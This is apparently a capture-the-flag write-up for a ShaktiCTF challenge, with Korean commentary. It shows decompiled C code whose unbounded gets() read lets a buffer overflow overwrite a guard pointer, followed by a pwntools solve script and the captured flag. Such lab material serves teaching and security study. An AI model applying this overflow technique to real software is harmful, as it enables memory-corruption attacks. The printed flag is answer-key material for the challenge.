# Description
The TV is supposed to be buffering. But it isn't doing that now. Strange.
Author: omelette_keychain
# 분석
/*
 * Decompiler pseudo-code for the challenge binary's main().
 *
 * Prints three prompt lines, reads one reply into the 10-byte buffer v5 with
 * gets(), then prints the contents of flag.txt only if the pointer v7 no
 * longer equals the address of the literal it was initialised with.
 *
 * Review notes:
 *  - gets() performs no bounds check, so a reply longer than v5 writes into
 *    the locals above it. Per the stack annotations below, v5 starts at
 *    rbp-0x1A, stream at rbp-0x10 and v7 at rbp-0x8.
 *  - The guard compares pointers, not string contents, so any change to v7
 *    satisfies it.
 *  - A bounded read such as fgets(v5, sizeof v5, stdin) would keep the reply
 *    inside v5.
 */
int __fastcall main(int argc, const char **argv, const char **envp)
{
char s[70]; // [rsp+0h] [rbp-60h] BYREF
_BYTE v5[10]; // [rsp+46h] [rbp-1Ah] BYREF
FILE *stream; // [rsp+50h] [rbp-10h]
char *v7; // [rsp+58h] [rbp-8h]
// v7 points at a string literal; 3735928559 is 0xDEADBEEF in decimal.
v7 = "3735928559";
puts("The TV usually keeps buffering. It isn't doing that now for some reason. I dunno why.");
puts("I need to show my cool TV fixing skills for the upcoming science fair!");
puts("I wonder what i can do to put it back to how it originally was... Any ideas? \nReply >> ");
// Unbounded read into a 10-byte buffer. NOTE(review): the second argument is
// presumably a decompiler artifact, since gets() takes only the buffer.
gets(v5, argv);
// Address comparison: true as soon as v7 holds anything other than the
// literal's address.
if ( v7 != "3735928559" )
{
// stream is assigned here, after the read, so whatever the overflow wrote
// into it is replaced before it is used.
stream = fopen("flag.txt", "r");
puts("The TV is back to buffering! Thanks!");
puts("...wait. It is showing some sorta secret code.");
// Only the printf is conditional: when fopen() fails, execution still
// reaches fgets() with a NULL stream.
if ( !stream )
printf("Error in opening the flag file. Flag file might be missing.");
// Reads at most 58 characters plus the terminator into the 70-byte s.
fgets(s, 59, stream);
puts(s);
// exit() ends the process here, so main() does not return on this path.
exit(0);
}
puts("Hmmm. It doen't work. Nice try though!");
return 0;
}
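`gets`는 입력 길이를 검사하지 않으므로 `v5`(10바이트, `rbp-0x1A`)를 넘어 쓰는 버퍼 오버플로가 가능하다. 조건문은 문자열 내용이 아니라 포인터 `v7`(`rbp-0x8`)의 값 자체를 비교하므로, `v7` 값만 덮어쓰면 된다.
`v5`에서 `v7`까지의 거리는 0x1A - 0x8 = 0x12바이트이고, 0x1A바이트를 보내면 `v5`, `stream`, `v7`이 모두 덮인다. `stream`은 `gets` 이후에 `fopen` 결과로 다시 대입되므로 덮여도 문제가 되지 않는다.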
# Payload
from pwn import *
# Local solve script for the binary analysed above (pwntools).
target_path = "./let_the_tv_buffer"
io = process(target_path)

# 0x1A filler bytes: v5 starts at rbp-0x1A, so this length runs through
# v5 (10 bytes), stream (8) and v7 (8). Changing v7 is enough, because the
# program compares the pointer value rather than the string it points to.
filler = b"A" * 0x1A

# Wait for the "Reply >> " prompt, send the line, then hand over the terminal
# so the program's output can be read.
io.sendlineafter(">> ", filler)
io.interactive()
# Flag
ShaktiCTF{@nd_th@t's_h0w_th3_buff3r_0v3rfl0w3d_tv_c00k3d!}